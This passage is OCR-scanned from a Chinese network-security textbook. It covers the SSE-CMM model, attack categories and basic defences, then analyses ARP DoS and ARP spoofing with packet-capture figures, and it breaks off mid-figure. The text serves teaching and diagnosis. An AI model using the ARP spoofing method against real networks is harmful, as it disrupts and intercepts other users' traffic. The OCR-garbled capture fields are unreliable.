现代 统计 过 程控 制 理论 表明 通过 强调 生产 过 程 的 高 质量 和 在 过 程 中 组 织 实施 的 成 熟 性 
可 以 低 成 本 地 生产 出 高 质量 产品 。 对 于 安全 系统 和 可 信 产 品 的 开发 ,如 果 增 加 所 需 的 成 本 
和 时 间 ,就 可 保证 更 有 效 的 过 程 。 安 全 系统 的 运行 与 维护 也 依赖 于 与 人 员 和 技术 相 联 系 的 
过 程 。 通 过 强调 所 使 用 过 程 的 质量 和 蕴涵 在 这 些 过 程 中 的 组 织 实 施 的 成 熟 性 ,可 以 更 低 成 
本 地 管理 这 些 安全 工程 。 

SSE-CMM 项 目的 目标 是 促进 安全 工程 成 为 一 个 确定 的 .成熟 的 和 可 度量 的 科目 。 这 
个 SSE-CMM 和 正在 开发 的 评定 方法 ,将 带 来 以 下 益处 : 

CD 通过 区 分 投标 者 的 能 力 级 别 和 相关 的 计划 风险 来 选择 合格 的 安全 工程 提供 商 ; 
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(2) 工程 组 把 投资 集中 在 安全 工程 工具 ,培训 ,过程 定义 ,管理 实施 和 改进 上 ; 

(3) 基于 能 力 的 保证 ,也 就 是 说 ,信赖 是 基于 对 工程 组 织 安 全 工程 实践 和 过 程 成 熟 的 
信心 。 

随 着 社会 对 信息 信赖 程度 的 增长 ,信息 的 保护 变 得 越 来 越 重 要 。 维 护 和 保护 信息 需要 
许多 产品 、 系 统 和 服务 。 安 全 工程 的 焦点 已 经 从 保护 管理 政府 保密 数据 转向 保护 更 广泛 的 
应 用 领域 ,其 中 包括 金融 交易 、 契 约 合同 ,个 人 信息 和 因特网 (Internet) 。 这 种 发 展 趋势 无 疑 
将 提高 安全 工程 在 未 来 的 重要 性 。 

SSE-CMM 的 范围 包括 下 面 几 项 。 

(1) SSE-CMM 涉及 可 信 产 品 或 系统 整个 生命 期 的 安全 工程 活动 ,其 中 包括 概念 定义 、 
需求 分 析 设计、 开发 集成 .安装 运行 .维护 和 终止 。 

(2) SSE-CMM 可 用 于 安全 产品 开发 者 、 安 全 系统 开发 者 、 集 成 商 和 提供 安全 服务 和 安 
全 工程 的 组 织 机 构 。 

SSE-CMM 可 应 用 于 所 有 类 型 和 大 小 的 安全 工程 机 构 , 如 商务 机 构 、 政 府 机 构 和 学 术 
机 构 。 

有 各 类 组 织 从 事 安 全 工程 ,其 中 包括 产品 开发 者 、 服 务 提供 者 、 系 统 集成 者 、 系 统管 理 
者 ,直至 安全 专家 。 其 中 部 分 组 织 处 理 高 层 问题 (如 运行 使 用 或 系统 体系 结构 有 关 的 问题 ) ， 
部 分 组 织 处 理 底层 问题 (如 机 制 选 择 和 设计 ) ,还 有 一 部 分 组 织 涉及 这 两 个 层面 。 某 些 组 织 
可 能 专长 于 某 些 特殊 技术 或 菜 些 特殊 环境 (如 在 海上 )。 

SSE-CMM 的 设计 可 用 于 所 有 这 些 组 织 。 采 用 SSE-CMM 并 不 意味 着 侧重 其 中 某 一 个 
方面 优 于 另 一 个 方面 ,也 不 意味 着 SSE-CMM 所 有 方面 都 需要 采用 。 组 织 的 商务 侧重 点 不 
必 由 于 使 用 SSE-CMM ,而 发 生 偏 离 。 

根据 组 织 关 注 的 焦点 ,可 采用 部 分 而 不 是 全 部 的 已 定义 安全 工程 实施 过 程 。 此 外 ,组 织 
可 能 会 需要 了 解 不 同 实施 的 关系 来 确定 实施 过 程 的 适用 性 。 


SSE-CMM 所 定义 的 元 素 均 认为 是 安全 工程 实施 的 本 质 要 素 。 但 是 ,并 非 所 有 项 目 或 
组 织 需 要 实施 SSE-CMM 的 所 有 过 程 区 。 因 此 ,对 于 特定 项 目 应 该 使 用 裁剪 过 程 以 去 掉 出 
组 织 安全 工程 过 程 中 不 必要 的 过 程 区 。 

使 用 任何 参考 模型 的 任何 过 程 改 进 均 应 支持 商务 目标 ,而 不 是 指导 商务 目标 。 使 用 
SSE-CMM 的 组 织 应 根据 商务 目标 来 划分 过 程 区 实施 的 优先 顺序 ,并 首先 致力 于 改进 最 高 
优先 级 的 过 程 区 。 

需要 注意 的 是 裁剪 是 在 过 程 区 的 层面 上 执行 的 。 为 了 达到 一 个 过 程 区 的 目标 ,使 用 把 
所 有 的 基本 实施 都 放 在 适当 的 位 置 的 思想 来 撰写 过 程 区 。 

为 测量 一 个 组 织 的 从 事 风险 评估 的 过 程 能 力 ,会 涉及 多 个 实施 组 共同 参与 。 在 系统 开 
发 或 集成 期 间 ,需要 评估 该 组 织 决定 与 分 析 安 全 脆弱 性 的 能 力 , 并 且 评 估 运 行 的 影响 。 在 这 
种 运行 情况 下 ,评估 组 织 对 系统 安全 态势 监控 的 能 力 , 识 别 并 分 析 安 全 脆弱 性 ,以 及 评估 运 
行 的 影响 。 

在 一 个 组 织 以 开发 防范 措施 为 主 的 情况 下 ,组 织 的 过 程 能 力 使 用 SSE-CMM 的 实施 组 
合 来 特征 化 。 该 模型 包含 的 实施 提供 了 决定 和 分 析 安全 脆弱 性 ` 评 估 运 行 影 响 和 为 其 他 组 
织 ( 如 软件 组 织 ) 提 供 指 南 和 提供 输入 。 提 供 开发 防范 措施 的 服务 组 织 需 要 理解 上 述 实施 间 


的 关系 。 

SSE-CMM 包括 致力 于 获得 顾客 安全 要 求 的 实施 。 这 些 安全 要 求 需 通 过 与 用 户 的 交互 
来 确定 。 当 产品 的 开发 独立 于 特定 顾客 时 ,顾客 是 泛 指 的 。 在 此 情况 下 ,如 果 需 要 ,产品 的 
市 场 部 或 其 他 部 门 可 以 作为 假设 的 顾客 。 

安全 工程 的 实施 者 认识 到 产品 开发 的 环境 和 方法 如 同 产品 本 身 一 样 是 可 变化 的 。 然 
而 ,已 知 一 些 关 于 产品 和 项 目 环境 的 问题 会 影响 到 产品 的 构想 、. 生 产 、 交 付 和 维护 。 以 下 问 
题 特别 对 SSE-CMM 具有 重要 影响 : 

。 顾客 群 类 型 (产品 ,系统 或 服务 ) 。 

。 保证 需求 (高 或 低 ) 。 

。 支持 开发 或 运行 的 组 织 。 

每 个 产业 都 自身 有 特殊 的 文化 ,术语 和 交流 模式 。 为 减少 角色 相关 性 和 组 织 结构 的 影 
响 ,SSE-CMM 期 望 能 容易 地 将 其 概念 转化 为 所 有 产业 部 门 自身 的 语言 和 文化 。 

SSE-CMM 和 使 用 模型 的 方法 ( 即 评定 方法 ) 所 建议 的 应 用 方式 如 下 : 

。 作为 工程 组 织 的 工具 ,用 于 评价 安全 工程 实施 活动 ,并 定义 它们 的 改进 。 

。 作为 顾客 评价 一 个 供应 商 的 安全 工程 能 力 的 标准 机 制 。 

。 作为 安全 工程 评价 机 构 ( 如 系统 认证 机 构 , 产 品评 定 机 构 等 ) 的 工作 基础 ,用 于 建立 

基于 整体 组 织 能 力 的 信任 度 ( 这 个 信任 度 可 作为 系统 或 产品 的 一 个 安全 保证 要 素 ) 。 

如 果 这 个 模型 及 其 评定 方法 的 使 用 者 能 够 完全 理解 模型 的 适用 范围 和 固有 的 局 限 性 ， 
那么 这 个 评定 技术 可 以 适用 于 自我 改进 和 选择 供应 商 。 

SSE-CMM 项 目 组 的 成 员 承 诺 系 统 工程 和 安全 工程 的 机 构 可 以 自由 使 用 SSE-CMM 项 
目 资料 。 项 目 参 与 者 同意 这 个 文件 当前 版 本 和 以 后 发 布 的 版 本 将 通过 许可 使 用 的 版 权 声 明 
继续 保持 自由 使 用 的 原则 。 如 果 使 用 者 在 复制 这 些 文件 或 在 其 基于 这 些 文件 派生 出 其 他 工 
作 产 品 中 包含 SSE-CMM 组 织 的 版 权 声 明 , 则 将 允许 免费 使 用 。 


1.3.2 SSE-CMM 的 益处 


安全 的 趋势 是 从 保护 政府 保密 数据 转向 涉及 更 广泛 的 领域 ,其 中 包括 金融 交易 、 契 约 合 
同 ` 个 人 信息 和 因特网 。 因 此 用 于 维护 和 保护 这 些 信 息 的 产品 ,系统 和 服务 开始 迅速 发 展 。 
这 些 安全 产品 和 系统 进入 市 场 一 般 有 两 种 途径 : 通过 长 周期 且 晶 贵 的 评定 后 进入 市 场 和 不 
加 评估 就 进入 市 场 。 对 于 前 者 ,安全 产品 无 法 及 时 进入 市 场 来 满足 用 户 安全 需求 , 当 进 入 到 
市 场 后 ,产品 所 具有 安全 功能 就 解决 威胁 而 言 已 经 过 时 ; 对 于 后 者 ,购买 者 和 用 户 只 能 依赖 
于 产品 或 系统 开发 者 或 操作 者 的 安全 说 明 , 这 造成 市 场 上 的 安全 工程 服务 都 将 基于 这 种 空 
洞 的 无 法 律 依据 的 基础 。 

这 种 情况 要 求 组 织 以 一 个 更 成 熟 的 方式 来 实施 安全 工程 。 特 别 地 ,在 安全 系统 和 安全 
产品 生产 和 操作 过 程 中 要 求 以 下 特性 : 

。 连续 性 : 以 前 获得 的 知识 将 用 于 将 来 。 

。 重复 性 : 保证 项 目 可 成 功 重复 实施 的 方法 。 

。 有 效 性 : 可 帮助 开发 者 和 评价 者 都 更 有 效 工 作 的 方法 。 

* 保证 : 落实 安全 需求 的 信心 。 

为 了 达到 这 些 要 求 ,需要 有 一 个 机 制 来 指导 组 织 机 构 去 理解 和 改进 其 安全 工程 实施 。 


网 络 安 会 与 信息 保障 概述 
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SSE-CMM 正 是 出 于 这 个 目的 ,用 于 改进 安全 工程 实施 的 现状 ,以 利用 它 达 到 提高 安全 系 
统 、 安 全 产品 和 安全 工程 服务 的 质量 和 可 用 性 并 降低 成 本 的 目的 。SSE-CMM 对 各 类 组 织 


主要 益处 如 下 : 

1. 工程 组 织 

工程 组 织 包 括 系统 集成 商 ,应 用 开发 者 .产品 厂商 和 服务 供应 商 。 这 些 组 织 使 用 SSE-CMM 
的 益处 包括 以 下 内 容 。 


(1) 通过 可 重复 和 可 预测 的 过 程 和 实施 来 减少 返工 。 
(2) 获得 真正 工程 执行 能 力 的 认可 ,特别 在 资源 选择 方面 。 
(3) 侧重 于 可 度量 组 织 的 资格 (成 熟 度 ) 和 改进 。 


2. 采购 者 
采购 者 包括 从 内 部 /外 部 得 到 系统 .产品 和 服务 的 组 织 , 以 及 最 终 用 户 。 这 些 组 织 使 用 
SSE-CMM 的 益处 包括 以 下 内 容 。 


CD 可 重用 的 标准 RFP 语言 和 评定 方法 。 

(2) 减少 选择 不 合格 投标 者 的 风险 (性 能 、 成 本 、 工 期 风险 ) 。 

(3) 基于 工业 标准 的 统一 评估 以 减少 争议 。 

(4) 在 产品 生产 或 提供 服务 过 程 中 建立 可 预测 和 可 重复 级 的 可 信 度 。 

3. 评价 组 织 

评价 组 织 包 括 系 统 认 证 组 织 . 系 统 授权 组 织 .产品 评价 组 织 和 产品 评估 组 织 。 这 些 组 织 
使 用 SSE-CMM 的 益处 包括 以 下 内 容 。 

(1) 与 系统 或 产品 变化 无 关 的 可 重用 的 过 程 评 定 结果 。 

(2) 在 安全 工程 与 其 他 工程 集成 中 的 信任 度 。 

(3) 基于 能 力 的 显 见 可 信 度 ,减少 安全 评估 工作 量 。 


1.3.3 SSE-CMM 项 目 


SSE-CMM 起 源 于 1993 年 4 月 美国 国家 安全 局 (NSA) 对 当时 各 类 能 力 成 熟 模型 
(CMM) 工 作 状 况 的 研究 以 判断 是 否 需 要 一 个 专门 应 用 于 安全 工程 的 CMM。 在 这 个 构思 
阶段 ,确定 了 一 个 初步 的 安全 工程 CMM(Strawman Security Engineering CMM) 作 为 这 个 
判断 过 程 的 基础 。 

1995 年 1 月 ,各 界 信息 安全 人 士 被 邀请 参加 第 一 届 公 开 安 全 工程 CMM 工作 讨论 会 。 
KA 60 多 个 组 织 的 代表 肯定 了 这 种 模型 的 需求 。 由 于 信息 安全 业界 的 兴趣 ,在 会 议 中 成 立 
了 项 目 工作 组 ,这 标志 着 安全 工程 CMM 开发 阶段 的 开始 。 项 目 工作 组 的 首次 会 议 在 1995 年 
3 月 举行 。 通 过 SSE-CMM 指导 组 织 、 创 作 组 织 和 应 用 工作 组 织 的 工作 ,完成 了 模型 和 认定 
方法 的 工作 。1996 年 10 月 出 版 了 SSE-CMM 模型 的 第 一 个 版 本 ,1997 年 4 月 出 版 了 评定 
方法 的 第 一 个 版 本 。 

为 了 验证 这 个 模型 和 评估 方法 ,从 1996 年 6 月 到 1997 年 6 月 进行 许多 实验 项 目 。 这 
些 实验 项 目 为 出 版 的 模型 和 评估 方法 1. 1 版 提供 了 宝贵 的 数据 。 在 实验 项 目 中 ,模型 的 第 
一 个 版 本 用 于 评估 了 两 个 大 型 系统 集成 商 、 两 个 服务 供应 商 和 一 个 产品 厂商 。 实 验 项 目 涉 
及 为 验证 这 个 模型 的 各 种 组 织 机 构 , 其 中 包括 : 不 同 规模 的 组 织 ; 合同 驱动 系统 开发 的 组 
织 和 市 场 驱动 产品 开发 的 组 织 ; 高 开发 保证 要 求 的 组 织 和 低 开发 保证 要 求 的 组 织 ; 提供 开 


发 .实施 和 服务 的 组 织 。 

1997 年 7 月 ,召开 了 第 二 届 公 开 系 统 安全 工程 CMM 工作 会 议 。 这 次 会 议 主要 涉及 模 
型 的 应 用 ,特别 在 采购 、 过 程 改进 、 产 品 和 系统 质量 保证 等 方面 的 应 用 。 这 次 会 议 文集 可 通 
过 SSE-CMM 的 Web 站 点 上 获得 。 在 这 次 会 议 上 ,确定 了 需 解决 的 问题 并 成 立 了 新 的 项 目 
组 织 来 直接 解决 这 些 问 题 。 

SSE-CMM 项 目 进展 来 自 于 安全 工程 业界 .美国 国防 部 办 公 室 和 加 拿 大 通信 安全 机 构 
积极 参与 和 共同 的 投入 ,并 得 NSA 的 部 分 赞助 和 配合 。SSE-CMM 项 目 结构 包括 一 个 指导 
组 .评定 方法 组 、 模 型 维护 组 .生命 期 支持 组 ; 轮廓 、 保 证 和 度量 组 ; 发 起 者 、 规 划 和 采纳 组 
以 及 关键 人 员 评 审 和 业界 评审 。SSE-CMM 项 目 组 织 结构 如 图 1.1 所 示 。 


工程 领导 


主席 
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图 1.1 SSE-CMM 项 目 组 织 结 


指导 组 在 促进 SSE-CMM 被 广泛 接受 和 采纳 的 同时 ,监督 指导 SSE-CMM 的 工作 过 
程 .产品 定义 和 项 目 进展 。 

评定 方法 组 负责 维护 SSE-CMM 的 评定 方法 (SSAM) ,其 中 包括 开发 第 三 方 的 评定 方法 。 
当 需 要 时 ,评估 方法 组 还 负责 计划 支持 和 分 析 一 个 实验 程序 来 测试 第 三 方 的 评定 方法 。 

模型 维护 组 负责 维护 模型 。 这 包括 确保 过 程 区 覆盖 所 有 业界 内 的 安全 活动 ,将 SSE- 
CMM 与 其 他 模型 的 冲突 减少 到 最 少 , 在 模型 文档 中 精确 描述 SSE-CMM 与 其 他 模型 的 
关系 。 

生命 期 支持 组 负责 开发 和 建立 一 个 评定 者 资格 和 评定 组 织 可 比 性 机 制 ; 负责 设计 和 实 
现 一 个 数据 库 , 用 于 维护 评估 数据 以 及 准备 和 发 布 如 何 解释 和 维护 这 些 数据 的 指南 。 

轮廓 .保证 和 度量 组 的 任务 是 调查 和 确认 轮廓 的 概念 ,确定 并 文档 化 SSE-CMM 实施 
保证 的 作用 ,鉴别 和 验证 安全 相关 于 使 用 SSE-CMM 的 安全 和 过 程 的 度量 方式 。 
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发 起 者 、 规 划 和 采纳 组 负责 贯彻 赞助 选择 (在 需要 时 ,包括 为 一 个 组 织 进 行 计划 和 定义 
以 维护 SSE-CMMD ; 开发 和 维护 完整 的 项 目 时 间 表 ,促进 和 促使 各 种 感 兴趣 的 团体 使 用 或 
采用 SSE-CMM, 

关键 评审 人 员 提 供 正 式 评 审 责任 承诺 并 按时 提供 对 SSE-CMM 项 目 工作 产品 的 评审 
意见 。 业 界 评审 也 可 以 评审 工作 产品 ,但 无 须 正式 的 责任 承诺 。 

成 员 组 织 以 赞助 参与 者 的 方式 来 支持 工作 组 。SSE-CMM 项 目的 发 起 者 NSA, 在 国防 
部 和 通信 和 安全 军事 组 织 的 支持 下 ,提供 技术 转移 、 项 目 帮助 和 技术 支持 的 资助 。 

SSE-CMM 是 由 一 些 在 开发 安全 产品 、 系 统 和 提供 安全 服务 方面 有 长 期 成 功 经 验 的 公 
司 合作 开发 的 。 关 键 评 审 人 员 是 从 大 量具 有 安全 工程 专业 背景 的 专家 中 选 出 的 ,这 些 专业 
背景 对 模型 作者 的 经 验 是 一 个 补充 。 


1.3.4 与 其 他 工程 和 研究 项 目的 关系 


目前 有 各 种 各 样 的 正在 进行 的 研究 项 目 ,这 些 项 目 与 SSE-CMM 在 目的 、 方 法 和 益处 
上 有 相同 之 处 。 但 这 些 研 究 没有 一 个 是 完全 针对 安全 工程 实施 的 。 这 正 是 需要 定义 一 个 特 
别 的 安全 工程 模型 的 理由 之 一 。 

当 SSE-CMM 是 一 个 改进 和 评估 安全 工程 能 力 的 独立 模型 时 ,这 并 不 意味 着 安全 工程 
的 实施 可 以 与 其 他 工程 科目 相 分 离 。 相 反 .SSE-CMM 支持 与 其 他 工程 科目 的 结合 。SSE- 
CMM 始终 认为 安全 是 遍布 在 所 有 工程 科目 (如 系统 、 软 件 、 硬 件 ) 中 的 ,并 在 模型 中 定义 了 
专门 部 分 来 处 理 这 个 问题 。 共 同 特 征 “ 协 调 安 全 实施 ”认识 到 安全 集成 的 需求 ,这 些 安 全 需 
要 与 项 目 和 组 织 内 的 所 有 科目 和 小 组 相 集 成 。 


1.4 网络 攻 击 简介 


1.4.1 网 络 攻击 


网 络 攻 击 也 称 为 网 络 入 侵 , 是 指 网 络 系统 内 部 发 生 的 任何 违反 安全 策略 的 事件 ,这 些 事 
件 可 能 来 自 于 系统 外 部 ,也 可 能 来 自 于 系统 内 部 ; 可 能 是 故意 的 ,也 可 能 是 无 意 偶发 的 。 


1.4.2 网 络 攻击 概述 


网 络 安全 面临 的 最 大 问题 就 是 人 为 的 恶意 攻击 。 人 为 的 恶意 攻击 包括 : 被 动 攻击 和 主 
动 攻击 。 

1. 被 动 攻击 

被 动 攻击 是 指 攻击 者 不 影响 网 络 和 计算 机 系统 的 正常 工作 ,从 而 窃听 、 截 获 正常 的 网 络 
通信 和 系统 服务 过 程 ,并 对 截获 的 数据 信息 进行 分 析 , 获 得 有 用 的 数据 ,以 达到 其 攻击 目的 。 
被 动 攻击 的 特点 是 难于 发 觉 。 一 般 来 说 ,在 网 络 和 计算 机 系统 没有 出 现任 何 异常 的 情况 下 ， 
没有 人 会 关心 发 生 过 什么 被 动 攻 击 。 

2. 主动 攻击 
主动 攻击 是 指 攻击 者 主动 侵入 网 络 和 计算 机 系统 ,参与 正常 的 网 络 通信 和 系统 服务 过 
程 , 并 在 其 中 发 挥 破坏 作用 ,以 达到 其 攻击 目的 。 主 动 攻击 的 种 类 极 多 ,新 的 主动 攻击 手段 


也 在 不 断 涌现 。 攻 击 者 进行 身份 假冒 攻击 要 实现 的 是 冒充 正常 用 户 ,欺骗 网 络 和 系统 服务 的 
提供 者 ,从 而 获得 非法 权限 和 敏感 数据 的 目的 ; 身份 窃取 攻击 是 要 取得 用 户 的 真正 身份 ,以 便 
为 进一步 攻击 做 准备 ; 错误 路 由 是 指 攻击 者 修改 路 由 器 中 的 路 由 表 , 将 数据 引 到 错误 的 网 络 
或 安全 性 较 差 的 机 器 上 来 ; 重 放 攻 击 是 指 在 监听 到 正常 用 户 的 一 次 有 效 操作 后 ,将 其 记录 下 
来 ,然后 对 这 次 操作 进行 重复 ,以 期 获得 与 正常 用 户 同样 的 对 待 。 计 算 机 病毒 攻击 的 手段 出 现 
得 更 早 , 其 种 类 繁多 ,影响 范围 广 。 不 过 以 前 的 病毒 多 是 毁坏 计算 机 内 部 数据 ,使 计算 机 瘫痪 。 
现在 某 些 病毒 已 经 与 黑客 程序 结合 起 来 ,被 黑客 利用 来 窃取 用 户 的 敏感 信息 ,危害 更 大 。 

网 络 软件 不 可 能 是 百分之百 的 无 缺陷 和 无 漏洞 的 ,然而 ,这 些 缺 陷 和 漏洞 恰恰 是 黑客 进 
行 攻击 的 首选 目标 ,曾经 出 现 过 的 黑客 攻 入 网 络 内 部 的 事件 ,这 些 事件 的 大 部 分 就 是 因为 安 
全 措施 不 完善 所 招致 的 苦果 。 另 外 ,软件 的 “后 门 ? 都 是 软件 公司 的 设计 编程 人 员 为 了 自 便 
而 设置 的 ,一 般 不 为 外 人 所 知 ,但 一 旦 “后 门洞 开 , 其 造成 的 后 果 将 不 堪 设 想 。 

计算 机 病毒 是 一 段 能 够 进行 自我 复制 的 程序 。 病 毒 运行 后 可 能 损坏 文件 ,使 系统 瘫痪 ， 
造成 各 种 难以 预料 的 后 果 。 在 网 络 环境 下 ,病毒 具有 不 可 估量 的 威胁 和 破坏 力 。 

常见 的 网 络 攻击 手段 如 图 1.2 Bro o 


Q21: 选 出 以 下 所 有 贵 单位 在 最 近 12 个 月 受到 过 的 网 络 攻击 类 型 ”数量 比例 (%%) 

1 偷窃 或 破坏 信息 所 有 权 或 机 密 信息 26 5.8 
2 未 受权 访问 37 8.4 
3 利用 网 络 的 金融 诈骗 7 1.6 
4 盗用 账号 站 5.6 
5 破坏 数据 或 网 络 35 7.9 
6 修改 网 页 51 11.6 
拒绝 服务 攻击 39 | 
8 大 量 网 络 扫描 导致 网 络 性 能 降低 57 13.0 
9 非法 线路 搭 线 或 侦 听 10 2.3 
10 病毒 .蠕虫 或 特洛伊 木马 331 75.3 
11 从 外 部 进行 的 系统 穿 透 36 8.1 
12 内 部 未 受权 信息 访问 35 7.9 
13 内 部 滥用 互联 网 访问 ,E-mail 或 内 部 计算 机 资源 46 10.5 

总 计 735 167.0 


图 1.2 常见 的 网 络 攻击 手段 


1.4.3 网 络 安 全 技术 


目前 网 络 安全 的 主要 技术 从 广义 上 讲 , 常 用 的 网 络 安全 主要 有 以 下 一 些 技术 ,并 已 经 有 
大 量 相应 的 安全 产品 出 现 。 

1. 加 密 

加 密 是 使 某 些 东西 只 能 是 某 些 特定 的 接收 者 可 以 知道 的 过 程 ,网 络 和 文件 经 常 使 用 加 
密 技 术 , 对 于 文件 而 言 , 加 密 把 容易 读 取 的 文件 变 成 密 文 文件 。 能 够 读 取 这 种 密 文 的 方法 是 
获得 密 钥 。 网 络 是 一 个 开放 的 系统 ,加密 变 得 非常 的 重要 。 加 密 是 提供 数据 保密 的 最 常用 
的 方法 。 现 在 有 几 种 类 型 的 加 密 技术 ,包括 硬件 的 和 软件 的 加 密 技 术 。 可 以 提供 数据 的 保 
密 性 和 完整 性 。 
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2. 认证 

认证 过 程 试 图 验证 一 个 用 户 、 系 统 或 系统 进程 的 身份 ,在 这 种 验证 发 生 时 ,依据 系统 管 
理 员 制 定 的 参数 而 使 真正 的 用 户 或 系统 能 够 获得 相应 的 权限 。 

用 户 或 系统 能 够 通过 4 种 方法 来 证 明 他 们 的 身份 , 即 通 过 以 下 4 种 方法 来 证 明 自 己 的 身份 。 

What you know 

What you have 

Who you are 

Where you are 

认证 用 来 标识 用 户 及 确定 用 户 的 真实 性 ,可 以 通过 加 密 来 实现 。 

3. 访问 控制 

每 个 系统 都 要 确保 只 有 他 们 想 要 的 个 体 ,系统 才 允 许 他 们 访问 。 这 种 机 制 称 为 访问 控 
制 。 一 个 网 络 内 部 的 机 制 确保 每 个 用 户 和 系统 只 能 访问 安全 策略 所 允许 的 访问 。 访 问 控制 
是 发 生 在 认证 过 程 之 后 ,在 经 过 系统 认证 后 ,是 通过 访问 控制 机 制 来 控制 用 户 在 系统 中 能 够 
访问 什么 ,这 种 机 制 能 用 于 赋予 或 拒绝 权限 。 所 有 的 操作 系统 都 支持 访问 控制 。 访 问 控制 
是 保护 服务 器 的 基本 机 制 。 必 须 在 服务 器 上 限制 哪些 用 户 可 以 访问 服务 或 守护 进程 。 

4. 审计 

审计 是 整个 安全 计划 中 的 一 个 特征 。 大 多 数 现在 的 系统 可 以 以 日 志文 件 的 形式 记录 下 
所 有 的 活动 。 这 些 日 志 可 以 帮助 对 用 户 实施 的 安全 进行 有 效 地 诊断 。 通 过 这 些 活动 的 日 
志 , 总 是 可 以 判断 是 否 有 一 个 不 允许 的 活动 发 生 。 

审计 包括 被 动 地 记录 一 些 活动 ,在 被 动 审计 中 ,计算 机 简单 地 记录 一 些 活动 ,并 不 做 什 
么 处 理 , 因 此 ,被 动 式 审计 不 是 一 个 实时 的 检测 。 因 为 必须 得 查看 这 些 日 志 , 然 后 对 其 中 包 
含 的 内 容 采取 措施 。 主 动 式 审计 原则 是 需要 用 户 前 期 事先 做 些 响应 设置 。 主 动 式 审计 包括 
主动 地 响应 非法 入 侵 , 这 些 响应 可 能 包括 : 结束 一 个 登录 会 话 ; 拒绝 一 些 主机 的 访问 (包括 
Web、FTP、E-mail 服务 器 ); 跟踪 非法 活动 的 源 位 置 。 


1.5 实例 分 析 一 一 ARP 攻击 及 欺骗 


ARP 攻击 及 欺骗 是 目前 局 域 网 中 经 常 出 现 的 一 个 网 络 异常 行为 , 轻 则 导致 用 户 无 法 正 
常 使 用 网 络 , 重 则 导致 网 络 设备 出 现 异 常 ,出 现 整个 网 络 瘫痪 ,影响 整个 网 络 运行 。 


1.5.1 ARP 攻击 行为 


1. ARP DoS 攻击 行为 

ARP DoS 攻击 行为 是 将 一 个 网 络 设备 (通常 为 PC) 通过 发 送 大 量 ( 可 能 达到 线 速 ) 正 确 
的 ARP 请 求 或 响应 报 文 来 干扰 网 络 设 备 正 常 运行 的 行为 。 

ARP DoS 攻击 行为 中 病毒 主机 发 送 的 ARP 报 文 从 报 文 内 容 及 对 网 络 内 其 他 主机 关于 
病毒 主机 的 ARP 表 项 影响 方面 来 看 ,即使 是 正确 的 ,但 从 发 送 速率 对 网 络 上 其 他 设备 的 影 
响 来 看 则 是 不 正常 的 。 攻 击 对 象 一般 为 病毒 主机 的 默认 网 关 , 路 由 器 或 交换 机 等 。 因 为 其 
影响 了 网 络 上 其 他 设备 对 ARP 报 文 的 正常 处 理 , 被 攻击 对 象 ( 一 般 为 病毒 主机 的 默认 网 
关 , 路 由 器 或 交换 机 等 ) 往 往 没 有 资源 来 响应 其 他 主机 的 ARP 请 求 ,影响 网 络 正 常 运行 。 


2. 实例 分 析 


故障 现象 : 网 关 为 一 台 核 心 交 换 机 ,下 接 网 络 交换 机 ,网 络 交换 机 下 接 个 人 主机 。 个 人 


主机 找 不 到 网 关上 ARP 信息 。 


主机 与 网 关 时 通 时 断 , 网 络 正常 时 个 人 主机 及 网 关上 ARP. 表 项 均 正 确 , 网 络 不 正常 时 个 人 


故障 原因 : 网 络 交换 机 某 接口 下 一 台 个 人 主机 发 送 大量 的 ARP 报 文 ,以 每 秒 接近 
15 000 的 速率 向 网 关 发 送 ARP 请 求 报 文 , 导 致 网 关 不 能 响应 其 他 主机 发 送 的 ARP 请 求 报 


文 ,如 图 1.3 所 示 。 


No Time Soi Destination ECES » 
449ky 3.020809 — Ms. Broadcast ARP — Who has im ie. ES Tell ig. ds n io 

44932 3.020895 — Ms. Broadcast ARP 

44933 3.020915 — Ms. Broadcast ARP 

44934 3.021014 — Ms. Broadcast ARP 

44935 3.021077 — Ms. Broadcast ARP 

44936 3.021147 Ms. Broadcast ARP 

44938 3.021281 — MS. Broadcast ARP 

44939 3.021350 Broadcast ARP 

44940 3.021414 Broadcast ARP 

44941 3.021484 Broadcast ARP 

44942 3.021549 Broadcast ARP 

44943 3.021618 Broadcast ARP ~] 


|v Frame 44937 (60 bytes on Im 50 bytes captured) 
|y Ethernet II, Sre: Ms1_62: or 7:62:1c:99), Dst: Broadcast (ff:ff:ff:ffiff:ff) 
& Destination: Broadcast t F) 
@ Source: Msi_62:1c:99 (00:1 
Type: ARP COx0806) 
Trailer: 000000000000000000000000000000000000 
|» Address Resolution Protocol (request) 
Hardware type: Ethernet (0x0001) 
Protocol type: IP (0x0800) 
Hardware size: 6 
Protocol size: 4 
Opcode: request (0x0001) 
Sender MAC address: Ms1_62:1c:9 
Sender IP address: 1 
Target MAC address: 
Target IP address: 192.168. 


:00:00 (00:0 
-1 (192.168.4.1) 


图 1.3 ARP DoS 攻击 报 文 


1.5.2 针对 PC 6$ ARP 欺骗 行为 
1. 针对 个 人 主机 的 ARP 欺骗 行为 


针对 个 人 主机 的 ARP 欺骗 行为 是 指 攻击 主机 通过 主动 向 被 攻击 主机 发 送 关 于 网 关 的 
ARP Reply 报 文 ,导致 被 攻击 主机 上 关于 网 关 ARP 表 项 变 成 攻击 主机 的 MAC, 从 而 导致 
被 攻击 主机 的 报 文 无 法 通过 正确 的 网 关 MAC 发 送出 去 ,从 而 导致 网 络 中 断 现象 。 


2. 实例 分 析 


某 网 络 中 网 络 交 换 机 下 的 个 人 主机 IP 地 址 属于 172. 16. 206. 0/24 网 段 ,网 关 地 址 为 
172.16. 206. 1(MAC 为 00-03-0F-02-93-82), 某 主机 172. 16. 206. 64, MAC 为 00-01-80-57- 


3f-5c 为 攻击 主机 ,被 攻击 主机 IP Jy 172. 16. 206.6, 具 体 步 骤 如 下 : 


(1) 攻击 主机 请 求 被 攻击 主机 的 MAC 地 址 ,如 图 1.4 所 示 。 


1/2.16.206.5 1$ at QU: 
o has 172.16.206.67 


es capturi 

[s ethernet ir, sre: Aopen 57:3f:5c (00:01:80:7:3f:90), Det: Broadcast (Ffiffiffiffiffiff) 
|s Address Resolution Protocol (request) 

Hardware type: Ethernet (0x0001) 

Protocol type: 1P (0x0800) 

Hardware size: 6 R 

Protocol size: 4 

Opcode: request (0x0001) 

Sender MAC address: Aopen 57:3f: 

Sender IP address 

Target MAC address: 

Target IP address: 1i 


V6 C172,16.208.6) 


图 1.4 针对 PC 的 ARP 欺骗 MAC 地 址 
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(2) 被 攻击 主机 回应 此 请 求 . 如 图 1. 5 所 示 。 
(3) 攻击 报 文 ,如 图 1.6 所 示 。 


16985 9,329120 


EE 


[s Frame 1699 (50 bytes on wi bytes 
